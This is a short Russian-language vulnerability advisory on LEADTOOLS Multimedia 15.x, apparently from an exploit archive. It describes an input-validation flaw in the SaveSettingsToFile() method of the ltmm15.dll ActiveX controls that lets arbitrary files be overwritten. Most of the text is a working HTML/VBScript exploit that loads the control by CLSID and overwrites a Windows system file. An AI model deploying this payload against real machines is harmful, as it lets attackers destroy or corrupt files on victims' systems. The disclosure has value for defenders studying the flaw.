Программа: LEADTOOLS Multimedia 15.x
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в ltmmCaptureCtrl Class, ltmmConvertCtrl Class, и ltmmPlayCtrl Class ActiveX компонентах (ltmm15.dll) в методе "SaveSettingsToFile()". Атакующий может перезаписать произвольные файлы на целевой системе.
Эксплоит:
<object classid='clsid:00150B1A-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.SaveSettingsToFile "c:\windows\system_.ini", 1
MsgBox "Exploit completed!"
End Sub
</script>
